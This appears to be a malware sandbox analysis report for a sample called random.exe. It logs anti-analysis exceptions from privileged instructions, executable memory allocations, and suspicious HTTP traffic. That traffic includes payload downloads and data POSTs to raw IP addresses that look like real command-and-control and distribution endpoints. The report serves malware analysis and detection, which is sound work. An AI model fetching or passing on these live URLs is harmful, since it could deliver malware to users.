__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: fb e9 42 06 00 00 57 50 c7 04 24 4a 06 ee 5d ff exception.symbol: random+0x6dd26 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 449830 exception.address: 0x11bdd26 registers.esp: 3210188 registers.edi: 0 registers.eax: 28305 registers.ebp: 4008620052 registers.edx: 18153472 registers.ebx: 18605751 registers.esi: 3 registers.ecx: 235753	1
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: fb 55 89 04 24 57 bf 92 05 83 3e e9 ca 00 00 00 exception.symbol: random+0x1e9890 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2005136 exception.address: 0x1339890 registers.esp: 3210184 registers.edi: 18638923 registers.eax: 31700 registers.ebp: 4008620052 registers.edx: 2345 registers.ebx: 425984 registers.esi: 20157765 registers.ecx: 20158347	1
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: fb e9 48 00 00 00 48 2d 78 8b f7 7d f7 d0 e9 1a exception.symbol: random+0x1ea04c exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2007116 exception.address: 0x133a04c registers.esp: 3210188 registers.edi: 18638923 registers.eax: 31700 registers.ebp: 4008620052 registers.edx: 2345 registers.ebx: 425984 registers.esi: 20157765 registers.ecx: 20190047	1
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: fb 52 e9 52 03 00 00 c1 e8 07 05 b4 5f 64 53 01 exception.symbol: random+0x1e9c2b exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2006059 exception.address: 0x1339c2b registers.esp: 3210188 registers.edi: 18638923 registers.eax: 31700 registers.ebp: 4008620052 registers.edx: 3419691112 registers.ebx: 4294938412 registers.esi: 20157765 registers.ecx: 20190047	1
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: fb 83 ec 04 89 3c 24 e9 68 00 00 00 c1 e0 06 c1 exception.symbol: random+0x1f0339 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2032441 exception.address: 0x1340339 registers.esp: 3210184 registers.edi: 40479 registers.eax: 28786 registers.ebp: 4008620052 registers.edx: 61585 registers.ebx: 20184223 registers.esi: 4254855313 registers.ecx: 96	1
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: fb 68 c5 ee 4d 09 89 14 24 57 e9 98 fa ff ff 58 exception.symbol: random+0x1f04fd exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2032893 exception.address: 0x13404fd registers.esp: 3210188 registers.edi: 40479 registers.eax: 28786 registers.ebp: 4008620052 registers.edx: 61585 registers.ebx: 20213009 registers.esi: 4254855313 registers.ecx: 96	1
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: fb 52 56 be 5d 48 ff 7d 68 78 d0 4a 59 89 34 24 exception.symbol: random+0x1f0035 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2031669 exception.address: 0x1340035 registers.esp: 3210188 registers.edi: 40479 registers.eax: 134889 registers.ebp: 4008620052 registers.edx: 61585 registers.ebx: 20187293 registers.esi: 4254855313 registers.ecx: 0	1
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: fb 53 e9 a8 fb ff ff 83 c4 04 68 00 00 00 00 29 exception.symbol: random+0x1f723a exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2060858 exception.address: 0x134723a registers.esp: 3210188 registers.edi: 5975576 registers.eax: 1114345 registers.ebp: 4008620052 registers.edx: 61585 registers.ebx: 20215402 registers.esi: 0 registers.ecx: 1969148396	1
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: ed 64 8f 05 00 00 00 00 50 c7 04 24 8d 65 25 5f exception.symbol: random+0x1fe1a3 exception.instruction: in eax, dx exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2089379 exception.address: 0x134e1a3 registers.esp: 3210180 registers.edi: 5975576 registers.eax: 1447909480 registers.ebp: 4008620052 registers.edx: 22104 registers.ebx: 1969033397 registers.esi: 20219566 registers.ecx: 20	1
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: 0f 3f 07 0b 64 8f 05 00 00 00 00 83 c4 04 83 fb exception.symbol: random+0x1fc990 exception.address: 0x134c990 exception.module: random.exe exception.exception_code: 0xc000001d exception.offset: 2083216 registers.esp: 3210180 registers.edi: 5975576 registers.eax: 1 registers.ebp: 4008620052 registers.edx: 22104 registers.ebx: 0 registers.esi: 20219566 registers.ecx: 20	1
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: ed 81 fb 68 58 4d 56 75 0a c7 85 3c 38 2d 12 01 exception.symbol: random+0x1f87eb exception.instruction: in eax, dx exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2066411 exception.address: 0x13487eb registers.esp: 3210180 registers.edi: 5975576 registers.eax: 1447909480 registers.ebp: 4008620052 registers.edx: 22104 registers.ebx: 2256917605 registers.esi: 20219566 registers.ecx: 10	1
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: cd 01 eb 00 6a 00 51 e8 03 00 00 00 20 59 c3 59 exception.symbol: random+0x200f3f exception.instruction: int 1 exception.module: random.exe exception.exception_code: 0xc0000005 exception.offset: 2101055 exception.address: 0x1350f3f registers.esp: 3210148 registers.edi: 0 registers.eax: 3210148 registers.ebp: 4008620052 registers.edx: 379466238 registers.ebx: 20254929 registers.esi: 20254929 registers.ecx: 20303759	1
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: fb 83 ec 04 e9 70 00 00 00 89 0c 24 54 59 56 57 exception.symbol: random+0x201b9e exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2104222 exception.address: 0x1351b9e registers.esp: 3210188 registers.edi: 5975576 registers.eax: 20281889 registers.ebp: 4008620052 registers.edx: 1461269177 registers.ebx: 36064640 registers.esi: 2283 registers.ecx: 4294943956	1
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: fb 50 89 0c 24 57 e9 55 00 00 00 58 c1 e8 03 57 exception.symbol: random+0x2102c9 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2163401 exception.address: 0x13602c9 registers.esp: 3210184 registers.edi: 18592950 registers.eax: 25986 registers.ebp: 4008620052 registers.edx: 20314916 registers.ebx: 36064861 registers.esi: 1968968720 registers.ecx: 0	1
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: fb 50 89 1c 24 bb d6 be 7d 1f f7 d3 e9 74 f6 ff exception.symbol: random+0x2104a7 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2163879 exception.address: 0x13604a7 registers.esp: 3210188 registers.edi: 18592950 registers.eax: 25986 registers.ebp: 4008620052 registers.edx: 20317446 registers.ebx: 0 registers.esi: 604801362 registers.ecx: 0	1
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: fb 53 e9 97 02 00 00 58 e9 57 00 00 00 83 c3 04 exception.symbol: random+0x21216a exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2171242 exception.address: 0x136216a registers.esp: 3210188 registers.edi: 18592950 registers.eax: 26544 registers.ebp: 4008620052 registers.edx: 736911255 registers.ebx: 20349239 registers.esi: 604801362 registers.ecx: 0	1
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: fb 68 7a c2 17 71 e9 ce 09 00 00 81 eb 60 8e 7b exception.symbol: random+0x211a26 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2169382 exception.address: 0x1361a26 registers.esp: 3210188 registers.edi: 18592950 registers.eax: 26544 registers.ebp: 4008620052 registers.edx: 736911255 registers.ebx: 20325539 registers.esi: 130025 registers.ecx: 0	1
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: fb 81 ea a3 a7 e9 7f e9 ae 03 00 00 81 24 24 1d exception.symbol: random+0x216199 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2187673 exception.address: 0x1366199 registers.esp: 3210176 registers.edi: 18592950 registers.eax: 29701 registers.ebp: 4008620052 registers.edx: 20340077 registers.ebx: 1192677264 registers.esi: 130025 registers.ecx: 732382139	1
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: fb e9 46 00 00 00 31 eb 31 dd e9 00 00 00 00 f7 exception.symbol: random+0x2162d0 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2187984 exception.address: 0x13662d0 registers.esp: 3210180 registers.edi: 18592950 registers.eax: 29701 registers.ebp: 4008620052 registers.edx: 20369778 registers.ebx: 1192677264 registers.esi: 130025 registers.ecx: 732382139	1
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: fb e9 97 01 00 00 81 c4 04 00 00 00 81 c3 04 00 exception.symbol: random+0x215f03 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2187011 exception.address: 0x1365f03 registers.esp: 3210180 registers.edi: 18592950 registers.eax: 29701 registers.ebp: 4008620052 registers.edx: 20369778 registers.ebx: 1192677264 registers.esi: 1179202795 registers.ecx: 4294940044	1
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: fb e9 0b 01 00 00 89 04 24 b8 05 0b 38 77 e9 ce exception.symbol: random+0x21b38a exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2208650 exception.address: 0x136b38a registers.esp: 3210176 registers.edi: 20360562 registers.eax: 29859 registers.ebp: 4008620052 registers.edx: 2130566132 registers.ebx: 1192677264 registers.esi: 1179202795 registers.ecx: 2129461248	1
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: fb 56 e9 fd 00 00 00 89 04 24 e9 d8 fd ff ff 89 exception.symbol: random+0x21b21c exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2208284 exception.address: 0x136b21c registers.esp: 3210180 registers.edi: 20363693 registers.eax: 0 registers.ebp: 4008620052 registers.edx: 2130566132 registers.ebx: 1192677264 registers.esi: 1179202795 registers.ecx: 30185	1
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: fb 50 89 e0 e9 98 01 00 00 8b 2c 24 83 c4 04 e9 exception.symbol: random+0x225723 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2250531 exception.address: 0x1375723 registers.esp: 3210180 registers.edi: 20404680 registers.eax: 27790 registers.ebp: 4008620052 registers.edx: 0 registers.ebx: 478809952 registers.esi: 18606112 registers.ecx: 2129461248	1
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: fb 81 ec 04 00 00 00 e9 39 00 00 00 2d 25 6c 53 exception.symbol: random+0x23c4da exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2344154 exception.address: 0x138c4da registers.esp: 3210148 registers.edi: 2336620820 registers.eax: 30612 registers.ebp: 4008620052 registers.edx: 2130566132 registers.ebx: 4245 registers.esi: 4062655562 registers.ecx: 20526594	1
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: fb 52 53 bb 67 ce ff 2d 89 da 5b 51 89 3c 24 bf exception.symbol: random+0x23c633 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2344499 exception.address: 0x138c633 registers.esp: 3210148 registers.edi: 2336620820 registers.eax: 1426090592 registers.ebp: 4008620052 registers.edx: 2130566132 registers.ebx: 4245 registers.esi: 0 registers.ecx: 20498982	1
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: fb e9 cb 02 00 00 81 e9 b3 51 db 7f 8b 14 24 81 exception.symbol: random+0x23d5e0 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2348512 exception.address: 0x138d5e0 registers.esp: 3210148 registers.edi: 2336620820 registers.eax: 27688 registers.ebp: 4008620052 registers.edx: 2130566132 registers.ebx: 20528825 registers.esi: 0 registers.ecx: 1321686337	1
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: fb 55 c7 04 24 67 90 a4 1e 89 1c 24 e9 45 01 00 exception.symbol: random+0x23d618 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2348568 exception.address: 0x138d618 registers.esp: 3210148 registers.edi: 2336620820 registers.eax: 27688 registers.ebp: 4008620052 registers.edx: 3334099539 registers.ebx: 20504045 registers.esi: 0 registers.ecx: 0	1
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: fb 68 df 5c 36 64 e9 00 00 00 00 89 04 24 b8 e0 exception.symbol: random+0x23e59d exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2352541 exception.address: 0x138e59d registers.esp: 3210144 registers.edi: 2336620820 registers.eax: 26235 registers.ebp: 4008620052 registers.edx: 3334099539 registers.ebx: 20504338 registers.esi: 0 registers.ecx: 181530918	1
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: fb 53 83 ec 04 e9 9e 00 00 00 55 52 e9 0b 02 00 exception.symbol: random+0x23e5bc exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2352572 exception.address: 0x138e5bc registers.esp: 3210148 registers.edi: 1392536160 registers.eax: 0 registers.ebp: 4008620052 registers.edx: 3334099539 registers.ebx: 20507601 registers.esi: 0 registers.ecx: 181530918	1
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: fb 51 89 14 24 c7 04 24 c3 64 e9 03 52 e9 e2 03 exception.symbol: random+0x242828 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2369576 exception.address: 0x1392828 registers.esp: 3210148 registers.edi: 20508464 registers.eax: 31936 registers.ebp: 4008620052 registers.edx: 20522512 registers.ebx: 65786 registers.esi: 20507632 registers.ecx: 20554772	1
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: fb 53 52 89 0c 24 68 2f cd fe 42 8b 0c 24 83 c4 exception.symbol: random+0x24309d exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2371741 exception.address: 0x139309d registers.esp: 3210148 registers.edi: 83689 registers.eax: 31936 registers.ebp: 4008620052 registers.edx: 20522512 registers.ebx: 65786 registers.esi: 0 registers.ecx: 20526072	1
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: fb 57 89 1c 24 89 34 24 68 40 40 1a 40 89 14 24 exception.symbol: random+0x243ba4 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2374564 exception.address: 0x1393ba4 registers.esp: 3210148 registers.edi: 20557442 registers.eax: 30834 registers.ebp: 4008620052 registers.edx: 1124098657 registers.ebx: 65786 registers.esi: 0 registers.ecx: 20526072	1
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: fb 56 50 b8 3b 64 d5 7f e9 d1 fb ff ff c1 e6 05 exception.symbol: random+0x243bf7 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2374647 exception.address: 0x1393bf7 registers.esp: 3210148 registers.edi: 20557442 registers.eax: 30834 registers.ebp: 4008620052 registers.edx: 4294939576 registers.ebx: 24811 registers.esi: 0 registers.ecx: 20526072	1
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: fb b8 eb 7f c3 53 e9 7f fe ff ff c1 e8 01 35 a5 exception.symbol: random+0x24662e exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2385454 exception.address: 0x139662e registers.esp: 3210148 registers.edi: 20557442 registers.eax: 20539470 registers.ebp: 4008620052 registers.edx: 1315681382 registers.ebx: 3939837675 registers.esi: 0 registers.ecx: 1583604139	1
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: fb 50 e9 1c ff ff ff 33 3c 24 e9 18 05 00 00 81 exception.symbol: random+0x24a5fc exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2401788 exception.address: 0x139a5fc registers.esp: 3210148 registers.edi: 4023901082 registers.eax: 604292945 registers.ebp: 4008620052 registers.edx: 27534 registers.ebx: 20580687 registers.esi: 878547165 registers.ecx: 4294943296	1
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: fb 81 c3 09 61 9d 77 03 1c 24 51 89 14 24 ba e2 exception.symbol: random+0x257d71 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2456945 exception.address: 0x13a7d71 registers.esp: 3210144 registers.edi: 20577948 registers.eax: 31150 registers.ebp: 4008620052 registers.edx: 2130566132 registers.ebx: 20609059 registers.esi: 20558289 registers.ecx: 0	1
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: fb 50 89 3c 24 51 89 e1 e9 58 fc ff ff 81 ce 23 exception.symbol: random+0x257e08 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2457096 exception.address: 0x13a7e08 registers.esp: 3210148 registers.edi: 20577948 registers.eax: 31150 registers.ebp: 4008620052 registers.edx: 2130566132 registers.ebx: 20640209 registers.esi: 604292950 registers.ecx: 4294939044	1
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: fb 55 89 e5 81 c5 04 00 00 00 e9 08 00 00 00 89 exception.symbol: random+0x25c145 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2474309 exception.address: 0x13ac145 registers.esp: 3210148 registers.edi: 20577948 registers.eax: 604292947 registers.ebp: 4008620052 registers.edx: 20628125 registers.ebx: 2048370274 registers.esi: 0 registers.ecx: 1049800664	1
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: fb 52 89 e2 e9 8a fb ff ff f7 14 24 68 0b 6e d2 exception.symbol: random+0x26cffb exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2543611 exception.address: 0x13bcffb registers.esp: 3210144 registers.edi: 20684251 registers.eax: 30283 registers.ebp: 4008620052 registers.edx: 2130566132 registers.ebx: 4026514431 registers.esi: 41293680 registers.ecx: 20694933	1
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: fb 81 ec 04 00 00 00 e9 79 01 00 00 8b 14 24 e9 exception.symbol: random+0x26cab8 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2542264 exception.address: 0x13bcab8 registers.esp: 3210148 registers.edi: 20684251 registers.eax: 4294940024 registers.ebp: 4008620052 registers.edx: 2130566132 registers.ebx: 210417256 registers.esi: 41293680 registers.ecx: 20725216	1
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: fb 81 ec 04 00 00 00 89 14 24 c7 04 24 ed 30 7d exception.symbol: random+0x276177 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2580855 exception.address: 0x13c6177 registers.esp: 3210148 registers.edi: 0 registers.eax: 26931 registers.ebp: 4008620052 registers.edx: 20758874 registers.ebx: 20699279 registers.esi: 4294942988 registers.ecx: 1347966032	1
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: fb 52 ba 12 41 fc 76 e9 2c fd ff ff ff 04 24 52 exception.symbol: random+0x2815d7 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2627031 exception.address: 0x13d15d7 registers.esp: 3210144 registers.edi: 20778822 registers.eax: 29849 registers.ebp: 4008620052 registers.edx: 11 registers.ebx: 20751807 registers.esi: 4243720 registers.ecx: 12	1
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: fb e9 3c 00 00 00 52 c7 04 24 54 d1 2f 7f e9 19 exception.symbol: random+0x281576 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2626934 exception.address: 0x13d1576 registers.esp: 3210148 registers.edi: 20808671 registers.eax: 29849 registers.ebp: 4008620052 registers.edx: 11 registers.ebx: 20751807 registers.esi: 4294940580 registers.ecx: 746672210	1
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: fb e9 17 04 00 00 5a 81 c2 0a 22 97 7b 81 c2 8a exception.symbol: random+0x29380c exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2701324 exception.address: 0x13e380c registers.esp: 3210148 registers.edi: 0 registers.eax: 26694 registers.ebp: 4008620052 registers.edx: 20857131 registers.ebx: 605849937 registers.esi: 20508671 registers.ecx: 3738837507	1
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: fb 68 c1 56 d4 1d 89 0c 24 c7 04 24 68 17 c4 0b exception.symbol: random+0x294202 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2703874 exception.address: 0x13e4202 registers.esp: 3210144 registers.edi: 0 registers.eax: 28925 registers.ebp: 4008620052 registers.edx: 20857322 registers.ebx: 991979792 registers.esi: 20508671 registers.ecx: 3738837507	1
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: fb 57 c7 04 24 61 23 e2 5b 89 04 24 e9 44 00 00 exception.symbol: random+0x2949c3 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2705859 exception.address: 0x13e49c3 registers.esp: 3210148 registers.edi: 0 registers.eax: 28925 registers.ebp: 4008620052 registers.edx: 20886247 registers.ebx: 991979792 registers.esi: 20508671 registers.ecx: 3738837507	1

HTTP traffic contains suspicious features which may be indicative of malware related traffic (7 events)

suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://185.215.113.19/Vi9leo/index.php
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://31.41.244.11/mine/random.exe
suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://31.41.244.10/Dem7kTu/index.php
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://31.41.244.11/steam/random.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.100/
suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://185.215.113.100/e2b1563c6670f193.php
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://31.41.244.11/well/random.exe

Performs some HTTP requests (7 events)

request	POST http://185.215.113.19/Vi9leo/index.php
request	GET http://31.41.244.11/mine/random.exe
request	POST http://31.41.244.10/Dem7kTu/index.php
request	GET http://31.41.244.11/steam/random.exe
request	GET http://185.215.113.100/
request	POST http://185.215.113.100/e2b1563c6670f193.php
request	GET http://31.41.244.11/well/random.exe

Sends data using the HTTP POST Method (3 events)

request	POST http://185.215.113.19/Vi9leo/index.php
request	POST http://31.41.244.10/Dem7kTu/index.php
request	POST http://185.215.113.100/e2b1563c6670f193.php

Allocates read-write-execute memory (usually to unpack itself) (50 out of 195 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Sept. 2, 2024, 10:58 a.m.	process_identifier: 2572 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76faf000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 2, 2024, 10:58 a.m.	process_identifier: 2572 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76f20000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 2, 2024, 10:58 a.m.	process_identifier: 2572 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 188416 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01151000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 2, 2024, 10:58 a.m.	process_identifier: 2572 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x009e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 2, 2024, 10:58 a.m.	process_identifier: 2572 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x009f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 2, 2024, 10:58 a.m.	process_identifier: 2572 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 2, 2024, 10:58 a.m.	process_identifier: 2572 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 2, 2024, 10:58 a.m.	process_identifier: 2572 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 2, 2024, 10:58 a.m.	process_identifier: 2572 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ab0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 2, 2024, 10:58 a.m.	process_identifier: 2572 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ac0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 2, 2024, 10:58 a.m.	process_identifier: 2572 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00bd0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 2, 2024, 10:58 a.m.	process_identifier: 2572 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00be0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 2, 2024, 10:58 a.m.	process_identifier: 2572 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00bf0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 2, 2024, 10:58 a.m.	process_identifier: 2572 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 2, 2024, 10:58 a.m.	process_identifier: 2572 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 2, 2024, 10:58 a.m.	process_identifier: 2572 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ca0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 2, 2024, 10:58 a.m.	process_identifier: 2572 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00e30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 2, 2024, 10:58 a.m.	process_identifier: 2572 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00f40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 2, 2024, 10:58 a.m.	process_identifier: 2572 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00f90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
